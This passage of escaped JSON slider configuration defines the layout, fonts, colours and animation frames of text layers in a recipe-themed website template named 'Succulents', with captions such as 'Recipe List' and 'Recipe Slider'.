"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"6\":{\"text\":\"Recipe List\",\"alias\":\"Reacents Post\",\"uid\":6,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"246px\",\"e\":true},\"n\":{\"v\":\"-441px\",\"e\":true},\"t\":{\"v\":\"246px\",\"e\":true},\"m\":{\"v\":\"246px\"}},\"y\":{\"d\":{\"v\":\"562px\",\"e\":true},\"n\":{\"v\":\"88px\",\"e\":true},\"t\":{\"v\":\"427px\",\"e\":true},\"m\":{\"v\":\"427px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\",\"e\":true},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Recipe Slider\",\"alias\":\"Reacents Post\",\"uid\":7,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"247px\",\"e\":true},\"n\":{\"v\":\"-429px\",\"e\":true},\"t\":{\"v\":\"247px\",\"e\":true},\"m\":{\"v\":\"247px\"}},\"y\":{\"d\":{\"v\":\"711px\",\"e\":true},\"n\":{\"v\":\"247px\",\"e\":true},\"t\":{\"v\":\"571px\",\"e\":true},\"m\":{\"v\":\"571px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\",\"e\":true},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"8\":{\"text\":\"Display your recipes for everyone to enjoy, all while including the images, a detailed description, a list of main & additional ingredients and more. \",\"alias\":\"It is a long establi...\",\"uid\":8,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"245px\",\"e\":true},\"n\":{\"v\":\"-327px\",\"e\":true},\"t\":{\"v\":\"245px\",\"e\":true},\"m\":{\"v\":\"245px\"}},\"y\":{\"d\":{\"v\":\"452px\",\"e\":true},\"n\":{\"v\":\"-2px\",\"e\":true},\"t\":{\"v\":\"322px\",\"e\":true},\"m\":{\"v\":\"322px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"A template which gives a neat overview of all recipes featured on your website, and lets your visitors access each recipe with a single click. \\n\",\"alias\":\"It is a long establi...\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"247px\",\"e\":true},\"n\":{\"v\":\"-327px\",\"e\":true},\"t\":{\"v\":\"247px\",\"e\":true},\"m\":{\"v\":\"247px\"}},\"y\":{\"d\":{\"v\":\"600px\",\"e\":true},\"n\":{\"v\":\"155px\",\"e\":true},\"t\":{\"v\":\"465px\",\"e\":true},\"m\":{\"v\":\"465px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":13,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"10\":{\"text\":\"With Succulents you can grab the all-important attention of your website visitors by showcasing the recipes in an eye-catching slider. \",\"alias\":\"It is a long establi...\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"249px\",\"e\":true},\"n\":{\"v\":\"-327px\",\"e\":true},\"t\":{\"v\":\"249px\",\"e\":true},\"m\":{\"v\":\"249px\"}},\"y\":{\"d\":{\"v\":\"749px\",\"e\":true},\"n\":{\"v\":\"313px\",\"e\":true},\"t\":{\"v\":\"612px\",\"e\":true},\"m\":{\"v\":\"612px\"}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":14,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":fa